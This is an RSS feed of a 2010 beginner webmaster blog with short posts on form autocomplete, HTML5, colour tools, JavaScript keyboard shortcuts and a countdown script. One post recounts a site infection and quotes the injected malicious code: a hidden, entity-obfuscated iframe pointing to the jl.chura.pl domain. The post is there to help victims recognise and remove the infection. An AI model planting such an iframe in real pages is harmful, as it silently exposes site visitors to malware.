<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Webmaster Sucks &#187; Html &amp; Javascript</title>
	<atom:link href="http://www.webmastersucks.com/cats/html-javascript/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.webmastersucks.com</link>
	<description>Here I share stuff I used to suck at as a novice webmaster..</description>
	<lastBuildDate>Tue, 11 May 2010 10:56:35 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Turn Off Autocomplete Form in Internet Explorer</title>
		<link>http://www.webmastersucks.com/turn-off-autocomplete-form-in-internet-explorer/</link>
		<comments>http://www.webmastersucks.com/turn-off-autocomplete-form-in-internet-explorer/#comments</comments>
		<pubDate>Wed, 11 Nov 2009 09:01:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[Html & Javascript]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[autocomplete]]></category>
		<category><![CDATA[autocomplete form]]></category>
		<category><![CDATA[autocomplete internet explorer]]></category>
		<category><![CDATA[close autocomplete]]></category>
		<category><![CDATA[internet explorer]]></category>
		<category><![CDATA[turn off auto complete]]></category>
		<category><![CDATA[turn off autocomplete]]></category>

		<guid isPermaLink="false">http://www.webmastersucks.com/?p=265</guid>
		<description><![CDATA[
			
				
			
		
A webmastersucks user ask me &#8220;The only problem is that IE will store the MD5 ] password when it &#8220;saves&#8221; the password. Have you been able to overcome that?&#8221;. Solution is really simple, just we can use autocomplete attribute in form tag. It will be close autocomplete in form. It will better in password protected [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.webmastersucks.com%2Fturn-off-autocomplete-form-in-internet-explorer%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.webmastersucks.com%2Fturn-off-autocomplete-form-in-internet-explorer%2F&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>A webmastersucks user ask me &#8220;The only problem is that IE will store the MD5 ] password when it &#8220;saves&#8221; the password. Have you been able to overcome that?&#8221;. Solution is really simple, just we can use autocomplete attribute in form tag. It will be close autocomplete in form. It will better in password protected sites.</p>
<pre class="brush: xml;">&lt;form name=&quot;form&quot; method=&quot;post&quot; autocomplete=&quot;off&quot;&gt;....&lt;/form&gt;</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.webmastersucks.com/turn-off-autocomplete-form-in-internet-explorer/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>What are the differences in HTML 5 and CSS3</title>
		<link>http://www.webmastersucks.com/what-are-the-differences-in-html-5-and-css3/</link>
		<comments>http://www.webmastersucks.com/what-are-the-differences-in-html-5-and-css3/#comments</comments>
		<pubDate>Mon, 20 Jul 2009 14:09:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[Html & Javascript]]></category>
		<category><![CDATA[css 3]]></category>
		<category><![CDATA[css3]]></category>
		<category><![CDATA[html 5]]></category>
		<category><![CDATA[html5]]></category>
		<category><![CDATA[perishablepress]]></category>

		<guid isPermaLink="false">http://www.webmastersucks.com/?p=217</guid>
		<description><![CDATA[
			
				
			
		
HTML 5 and css 3 is come to our life. But what are the differences in HTML 5 and CSS 3. In this article you can find details of HTML 5 and Css 3. We share HTML 5 Canvas Cheat Sheet in our posts.
http://perishablepress.com/press/2009/07/19/power-of-html5-css3/
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.webmastersucks.com%2Fwhat-are-the-differences-in-html-5-and-css3%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.webmastersucks.com%2Fwhat-are-the-differences-in-html-5-and-css3%2F&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>HTML 5 and css 3 is come to our life. But what are the differences in HTML 5 and CSS 3. In this article you can find details of HTML 5 and Css 3. We share <a href="http://www.webmastersucks.com/html5-canvas-cheat-sheet-v1-0/" target="_blank">HTML 5 Canvas Cheat Sheet</a> in our posts.</p>
<p><a href="http://perishablepress.com/press/2009/07/19/power-of-html5-css3/">http://perishablepress.com/press/2009/07/19/power-of-html5-css3/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.webmastersucks.com/what-are-the-differences-in-html-5-and-css3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Iframe Virus jl.chura.pl Removal</title>
		<link>http://www.webmastersucks.com/iframe-virus-jl-chura-pl-removal/</link>
		<comments>http://www.webmastersucks.com/iframe-virus-jl-chura-pl-removal/#comments</comments>
		<pubDate>Sat, 27 Jun 2009 23:18:53 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Html & Javascript]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Php]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[avast]]></category>
		<category><![CDATA[chura]]></category>
		<category><![CDATA[chura.pl virus]]></category>
		<category><![CDATA[clean iframe virus]]></category>
		<category><![CDATA[download avast]]></category>
		<category><![CDATA[download avast free]]></category>
		<category><![CDATA[download avast free edition]]></category>
		<category><![CDATA[free avast]]></category>
		<category><![CDATA[google badware]]></category>
		<category><![CDATA[google blocks]]></category>
		<category><![CDATA[how to clean virus jl.chura.pl rc]]></category>
		<category><![CDATA[how to remove iframe virus]]></category>
		<category><![CDATA[how to remove the jl.chura.pl]]></category>
		<category><![CDATA[html iframe virus]]></category>
		<category><![CDATA[iframe exploit]]></category>
		<category><![CDATA[iframe virus]]></category>
		<category><![CDATA[iframe virus fix]]></category>
		<category><![CDATA[iframe virus removal]]></category>
		<category><![CDATA[jk.chura.pl]]></category>
		<category><![CDATA[jl.chura.pl how to remove]]></category>
		<category><![CDATA[jl.chura.pl remove]]></category>
		<category><![CDATA[jl.chura.pl virus]]></category>
		<category><![CDATA[remove iframe virus]]></category>
		<category><![CDATA[removing jl.chura.pl]]></category>
		<category><![CDATA[trojan iframe]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[virus exploit iframe]]></category>
		<category><![CDATA[virus html iframe]]></category>
		<category><![CDATA[website iframe virus]]></category>

		<guid isPermaLink="false">http://www.webmastersucks.com/?p=201</guid>
		<description><![CDATA[
			
				
			
		
Today i upload an index file to my web site and i saw an iframe that site. I am shocked. Because i never use any iframe. I enter another sites for checking. All web sites are iframed. In my explorer all web sites are virused. I checked my sites to my friends. They saw iframe [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.webmastersucks.com%2Fiframe-virus-jl-chura-pl-removal%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.webmastersucks.com%2Fiframe-virus-jl-chura-pl-removal%2F&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>Today i upload an index file to my web site and i saw an iframe that site. I am shocked. Because i never use any iframe. I enter another sites for checking. All web sites are iframed. In my explorer all web sites are virused. I checked my sites to my friends. They saw iframe virus in my site. I search this virus, it is changing index and default files. Add code like here..</p>
<pre class="brush: xml;">
&lt;iframe src=&quot;http://jL.ch&amp;#117;ra.pl/rc/&quot; style=&quot;d&amp;#105;splay:none&quot;&gt;&lt;/iframe&gt;
</pre>
<h2><span style="color: #ff0000;">UPDATED (5th June 2009): </span></h2>
<p><span style="color: #ff0000;"><span style="color: #000000;">After a while, virus come back. I used Avast Free Version, that is find all viruses and removed. But it is damaged infected files. All infected .html and .php files are deleted. <a title="Download Avast" href="http://download.cnet.com/3001-20_4-10019223.html?spi=4dbf5a7a962839f84995d1ff0cbbd71c" target="_blank">Download Avast Home Edition &gt;</a></span></span></p>
<p>This virus also affected your google results. Google can block your site because of badware. You have to read &#8220;<a href="http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html" target="_blank">My site&#8217;s been hacked &#8211; now what?</a>&#8221; and after remove your virus you have to read &#8220;<a href="http://googlewebmastercentral.blogspot.com/2008/08/hey-google-i-no-longer-have-badware.html" target="_blank">Hey Google, I no longer have badware</a>&#8220;.</p>
<p><strong>PS:</strong> I am not guarenteed virus removal, these are only what i do.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.webmastersucks.com/iframe-virus-jl-chura-pl-removal/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>HTML5 Canvas Cheat Sheet v1.0</title>
		<link>http://www.webmastersucks.com/html5-canvas-cheat-sheet-v1-0/</link>
		<comments>http://www.webmastersucks.com/html5-canvas-cheat-sheet-v1-0/#comments</comments>
		<pubDate>Tue, 23 Jun 2009 12:23:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[Html & Javascript]]></category>
		<category><![CDATA[canvas cheat sheet]]></category>
		<category><![CDATA[cheat sheet]]></category>
		<category><![CDATA[html 5]]></category>
		<category><![CDATA[html5]]></category>
		<category><![CDATA[html5 cheat sheet]]></category>
		<category><![CDATA[html5 cheats]]></category>

		<guid isPermaLink="false">http://www.webmastersucks.com/?p=189</guid>
		<description><![CDATA[
			
				
			
		
Here is canvas cheat sheet of HTML5.
Multiple-page version:
http://whatwg.org/html5
One-page version:
http://www.whatwg.org/specs/web-apps/current-work/
PDF print versions:
A4: http://www.whatwg.org/specs/web-apps/current-work/html5-a4.pdf
Letter: http://www.whatwg.org/specs/web-apps/current-work/html5-letter.pdf
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.webmastersucks.com%2Fhtml5-canvas-cheat-sheet-v1-0%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.webmastersucks.com%2Fhtml5-canvas-cheat-sheet-v1-0%2F&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>Here is canvas cheat sheet of HTML5.</p>
<div id="attachment_191" class="wp-caption alignnone" style="width: 560px"><a href="/uploads/HTML5_Canvas_Cheat_Sheet.png"><img class="size-full wp-image-191 " title="HTML5 Canvas Cheat Sheet" src="http://www.webmastersucks.com/uploads/HTML5_Canvas_Cheat_Sheet_mi.jpg" alt="Click For Full Size" width="550" height="407" /></a><p class="wp-caption-text">Click For Full Size</p></div>
<dt style="CLEAR: left; MARGIN-TOP: 0.75em; FONT-WEIGHT: bold; MARGIN-BOTTOM: 0.25em; FONT-STYLE: normal">Multiple-page version:</dt>
<dd style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"><a style="COLOR: #0000cc; BACKGROUND-COLOR: transparent; -webkit-background-clip: initial; -webkit-background-origin: initial" href="http://www.whatwg.org/specs/web-apps/current-work/multipage/">http://whatwg.org/html5</a></dd>
<dt style="CLEAR: left; MARGIN-TOP: 0.75em; FONT-WEIGHT: bold; MARGIN-BOTTOM: 0.25em; FONT-STYLE: normal">One-page version:</dt>
<dd style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"><a style="COLOR: #660099; BACKGROUND-COLOR: transparent; -webkit-background-clip: initial; -webkit-background-origin: initial" href="http://www.whatwg.org/specs/web-apps/current-work/">http://www.whatwg.org/specs/web-apps/current-work/</a></dd>
<dt style="CLEAR: left; MARGIN-TOP: 0.75em; FONT-WEIGHT: bold; MARGIN-BOTTOM: 0.25em; FONT-STYLE: normal">PDF print versions:</dt>
<dd style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px">A4: <a style="COLOR: #660099; BACKGROUND-COLOR: transparent; -webkit-background-clip: initial; -webkit-background-origin: initial" href="http://www.whatwg.org/specs/web-apps/current-work/html5-a4.pdf">http://www.whatwg.org/specs/web-apps/current-work/html5-a4.pdf</a></dd>
<dd style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px">Letter: <a style="COLOR: #0000cc; BACKGROUND-COLOR: transparent; -webkit-background-clip: initial; -webkit-background-origin: initial" href="http://www.whatwg.org/specs/web-apps/current-work/html5-letter.pdf">http://www.whatwg.org/specs/web-apps/current-work/html5-letter.pdf</a></dd>
]]></content:encoded>
			<wfw:commentRss>http://www.webmastersucks.com/html5-canvas-cheat-sheet-v1-0/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Web Site Color Schemes</title>
		<link>http://www.webmastersucks.com/web-site-color-schemes/</link>
		<comments>http://www.webmastersucks.com/web-site-color-schemes/#comments</comments>
		<pubDate>Sat, 20 Jun 2009 19:04:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[Html & Javascript]]></category>
		<category><![CDATA[color]]></category>
		<category><![CDATA[color jack]]></category>
		<category><![CDATA[color palette]]></category>
		<category><![CDATA[color palette creator]]></category>
		<category><![CDATA[color palette generator]]></category>
		<category><![CDATA[color scheme]]></category>
		<category><![CDATA[color schemes]]></category>
		<category><![CDATA[color sheme designer]]></category>
		<category><![CDATA[color shemer]]></category>
		<category><![CDATA[color toy]]></category>
		<category><![CDATA[colour]]></category>
		<category><![CDATA[colour schemes]]></category>
		<category><![CDATA[website]]></category>

		<guid isPermaLink="false">http://www.webmastersucks.com/?p=183</guid>
		<description><![CDATA[
			
				
			
		
Webmasters basic problem is selecting color. If you select color, design is coming with that color. Here is some color scheme tools and color scheme selectors. You can select one color and you can see other colors which are beatiful with that colour.

Color Sheme Designer
Color Shemer Gallery
Color Palette Generator
Color Palette Generator (from selected file)
Color Palette [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.webmastersucks.com%2Fweb-site-color-schemes%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.webmastersucks.com%2Fweb-site-color-schemes%2F&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p><img class="alignright size-full wp-image-184" title="Color Scheme" src="http://www.webmastersucks.com/uploads/color-scheme.jpg" alt="Color Scheme" width="150" height="150" />Webmasters basic problem is selecting color. If you select color, design is coming with that color. Here is some color scheme tools and color scheme selectors. You can select one color and you can see other colors which are beatiful with that colour.</p>
<ul>
<li><a href="http://colorschemedesigner.com/" target="_blank">Color Sheme Designer</a></li>
<li><a href="http://www.colorschemer.com/schemes/" target="_blank">Color Shemer Gallery</a></li>
<li><a href="http://www.degraeve.com/color-palette/index.php" target="_blank">Color Palette Generator</a></li>
<li><a href="http://jrm.cc/color-palette-generator/" target="_blank">Color Palette Generator (from selected file)</a></li>
<li><a href="http://slayeroffice.com/tools/color_palette/" target="_blank">Color Palette Creator</a></li>
<li><a href="http://www.colorjack.com/sphere/" target="_blank">Color Jack</a></li>
<li><a href="http://www.colortoy.net/" target="_blank">Color Toy 2.0</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.webmastersucks.com/web-site-color-schemes/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Using Keyboard Shortcuts in Javascript</title>
		<link>http://www.webmastersucks.com/using-keyboard-shortcuts-in-javascript/</link>
		<comments>http://www.webmastersucks.com/using-keyboard-shortcuts-in-javascript/#comments</comments>
		<pubDate>Tue, 16 Jun 2009 20:16:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Html & Javascript]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[jquery]]></category>
		<category><![CDATA[jquery framework]]></category>
		<category><![CDATA[keyboard codes]]></category>
		<category><![CDATA[keyboard shorcuts]]></category>

		<guid isPermaLink="false">http://www.webmastersucks.com/?p=167</guid>
		<description><![CDATA[
			
				
			
		
New type of web sites use keyboards for some functions. It is always helping more usable. I hope this codes will help your web site.
In the following example, we&#8217;re simply going to verify the key pressed down by the user. If the key pressed are Ctrl+S, a function will be triggered.
var isCtrl = false;
document.onkeyup=function(e) {
    [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.webmastersucks.com%2Fusing-keyboard-shortcuts-in-javascript%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.webmastersucks.com%2Fusing-keyboard-shortcuts-in-javascript%2F&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>New type of web sites use keyboards for some functions. It is always helping more usable. I hope this codes will help your web site.</p>
<p>In the following example, we&#8217;re simply going to verify the key pressed down by the user. If the key pressed are Ctrl+S, a function will be triggered.</p>
<pre class="brush: jscript;">var isCtrl = false;
document.onkeyup=function(e) {
    if(e.which == 17) isCtrl=false;
}document.onkeydown=function(e){
    if(e.which == 17) isCtrl=true;
    if(e.which == 83 &amp;&amp; isCtrl == true) {
         alert('Keyboard shortcuts are cool!');
         return false;
    }
}</pre>
<p><strong>Example with the JQuery framework</strong></p>
<pre class="brush: jscript;">var isCtrl = false;$(document).keyup(function (e) {
if(e.which == 17) isCtrl=false;
}).keydown(function (e) {
    if(e.which == 17) isCtrl=true;
    if(e.which == 83 &amp;&amp; isCtrl == true) {
        alert('Keyboard shortcuts + JQuery are even more cool!');
return false;
}
});</pre>
<p>For more and keyboard shorcuts codes <a href="http://www.catswhocode.com/blog/using-keyboard-shortcuts-in-javascript" target="_blank">click here&gt;</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.webmastersucks.com/using-keyboard-shortcuts-in-javascript/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Test Your Web Sites in IE8, IE7 IE 6 and IE5.5</title>
		<link>http://www.webmastersucks.com/test-your-web-sites-in-ie8-ie7-ie-6-and-ie5-5/</link>
		<comments>http://www.webmastersucks.com/test-your-web-sites-in-ie8-ie7-ie-6-and-ie5-5/#comments</comments>
		<pubDate>Mon, 15 Jun 2009 19:42:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[Html & Javascript]]></category>
		<category><![CDATA[download ietester]]></category>
		<category><![CDATA[ie tester]]></category>
		<category><![CDATA[ie5.5]]></category>
		<category><![CDATA[ie6]]></category>
		<category><![CDATA[ie7]]></category>
		<category><![CDATA[ie9]]></category>
		<category><![CDATA[ietester]]></category>
		<category><![CDATA[internet exploer test]]></category>
		<category><![CDATA[internet explorer]]></category>
		<category><![CDATA[internet explorer 5.5]]></category>
		<category><![CDATA[internet explorer 6]]></category>
		<category><![CDATA[internet explorer 7]]></category>
		<category><![CDATA[internet explorer 8]]></category>
		<category><![CDATA[internet explorer tester]]></category>

		<guid isPermaLink="false">http://www.webmastersucks.com/?p=163</guid>
		<description><![CDATA[
			
				
			
		
All webmasters first problem is browser testing. Also Internet Explorer testing is like killing your self. I found this program and it saves my life. IETester is test your sites in Internet Explorer 5.5, 6, 7, 8.
They say about them selves &#8220;IETester is a free WebBrowser that allows you to have the rendering and javascript [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.webmastersucks.com%2Ftest-your-web-sites-in-ie8-ie7-ie-6-and-ie5-5%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.webmastersucks.com%2Ftest-your-web-sites-in-ie8-ie7-ie-6-and-ie5-5%2F&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p><img class="alignright size-full wp-image-164" title="IETester" src="http://www.webmastersucks.com/uploads/ietester.jpg" alt="IETester" width="257" height="64" />All webmasters first problem is browser testing. Also Internet Explorer testing is like killing your self. I found this program and it saves my life. IETester is test your sites in Internet Explorer 5.5, 6, 7, 8.</p>
<p>They say about them selves &#8220;IETester is a free WebBrowser that allows you to have the rendering and javascript engines of IE8, IE7 IE 6 and IE5.5 on Vista and XP, as well as the installed IE in the same process.&#8221;</p>
<p><a rel="nofollow" href="http://www.my-debugbar.com/ietester/install-ietester-v0.3.3.exe">Download IETester v0.3.3</a></p>
<p><a href="http://www.my-debugbar.com/wiki/IETester/HomePage" target="_blank">IE Tester Home Page &gt;</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.webmastersucks.com/test-your-web-sites-in-ie8-ie7-ie-6-and-ie5-5/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Countdown Date &amp; Time JavaScript</title>
		<link>http://www.webmastersucks.com/countdown-date-time-javascript/</link>
		<comments>http://www.webmastersucks.com/countdown-date-time-javascript/#comments</comments>
		<pubDate>Sun, 14 Jun 2009 16:57:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Html & Javascript]]></category>
		<category><![CDATA[countdown]]></category>
		<category><![CDATA[countdown date]]></category>
		<category><![CDATA[countdown javascript]]></category>
		<category><![CDATA[countdown time]]></category>
		<category><![CDATA[javascript]]></category>

		<guid isPermaLink="false">http://www.webmastersucks.com/?p=158</guid>
		<description><![CDATA[
			
				
			
		
I need javascript to countdown a date but with time. I search a lot and find a solution. Here it is  
You can use in your HTML file:
Dont worry! Only &#60;script language=&#34;JavaScript&#34;&#62;
TargetDate = &#34;6/11/2010 1:00&#34;;
BackColor = &#34;white&#34;;
ForeColor = &#34;navy&#34;;
CountActive = true;
CountStepper = -1;
LeadingZero = true;
DisplayFormat = &#34;%%D%% Day, %%H%% Hour, %%M%% Minute, %%S%% Second [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.webmastersucks.com%2Fcountdown-date-time-javascript%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.webmastersucks.com%2Fcountdown-date-time-javascript%2F&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>I need javascript to countdown a date but with time. I search a lot and find a solution. Here it is <img src='http://www.webmastersucks.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong>You can use in your HTML file:</strong></p>
<pre class="brush: jscript;">Dont worry! Only &lt;script language=&quot;JavaScript&quot;&gt;
TargetDate = &quot;6/11/2010 1:00&quot;;
BackColor = &quot;white&quot;;
ForeColor = &quot;navy&quot;;
CountActive = true;
CountStepper = -1;
LeadingZero = true;
DisplayFormat = &quot;%%D%% Day, %%H%% Hour, %%M%% Minute, %%S%% Second &quot;;
FinishMessage = &quot;World cup start..&quot;;
&lt;/script&gt;
&lt;script language=&quot;JavaScript&quot; src=&quot;countdown.js&quot;&gt;&lt;/script&gt; left to begin World Cup 2010.</pre>
<p><span id="more-158"></span><br />
<strong>countdown.js</strong></p>
<pre class="brush: jscript;">/*
Author: Robert Hashemian
&lt;a href=&quot;http://www.hashemian.com/&quot;&gt;http://www.hashemian.com/&lt;/a&gt;

You can use this code in any manner so long as the author's
name, Web address and this disclaimer is kept intact.
*/

function calcage(secs, num1, num2) {
  s = ((Math.floor(secs/num1))%num2).toString();
  if (LeadingZero &amp;&amp; s.length &lt; 2)
    s = &quot;0&quot; + s;
  return &quot;&lt;b&gt;&quot; + s + &quot;&lt;/b&gt;&quot;;
}

function CountBack(secs) {
  if (secs &lt; 0) {
    document.getElementById(&quot;cntdwn&quot;).innerHTML = FinishMessage;
    return;
  }
  DisplayStr = DisplayFormat.replace(/%%D%%/g, calcage(secs,86400,100000));
  DisplayStr = DisplayStr.replace(/%%H%%/g, calcage(secs,3600,24));
  DisplayStr = DisplayStr.replace(/%%M%%/g, calcage(secs,60,60));
  DisplayStr = DisplayStr.replace(/%%S%%/g, calcage(secs,1,60));

  document.getElementById(&quot;cntdwn&quot;).innerHTML = DisplayStr;
  if (CountActive)
    setTimeout(&quot;CountBack(&quot; + (secs+CountStepper) + &quot;)&quot;, SetTimeOutPeriod);
}

function putspan(backcolor, forecolor) {
 document.write(&quot;&lt;span id='cntdwn' style='background-color:&quot; + backcolor +
                &quot;; color:&quot; + forecolor + &quot;'&gt;&lt;/span&gt;&quot;);
}

if (typeof(BackColor)==&quot;undefined&quot;)
  BackColor = &quot;white&quot;;
if (typeof(ForeColor)==&quot;undefined&quot;)
  ForeColor= &quot;black&quot;;
if (typeof(TargetDate)==&quot;undefined&quot;)
  TargetDate = &quot;12/31/2020 5:00 AM&quot;;
if (typeof(DisplayFormat)==&quot;undefined&quot;)
  DisplayFormat = &quot;%%D%% Days, %%H%% Hours, %%M%% Minutes, %%S%% Seconds.&quot;;
if (typeof(CountActive)==&quot;undefined&quot;)
  CountActive = true;
if (typeof(FinishMessage)==&quot;undefined&quot;)
  FinishMessage = &quot;&quot;;
if (typeof(CountStepper)!=&quot;number&quot;)
  CountStepper = -1;
if (typeof(LeadingZero)==&quot;undefined&quot;)
  LeadingZero = true;
CountStepper = Math.ceil(CountStepper);
if (CountStepper == 0)
  CountActive = false;
var SetTimeOutPeriod = (Math.abs(CountStepper)-1)*1000 + 990;
putspan(BackColor, ForeColor);
var dthen = new Date(TargetDate);
var dnow = new Date();
if(CountStepper&gt;0)
  ddiff = new Date(dnow-dthen);
else
  ddiff = new Date(dthen-dnow);
gsecs = Math.floor(ddiff.valueOf()/1000);
CountBack(gsecs);
</pre>
<p>Script Author: <a href="http://www.hashemian.com/" target="_blank">Robert Hashemian</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.webmastersucks.com/countdown-date-time-javascript/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
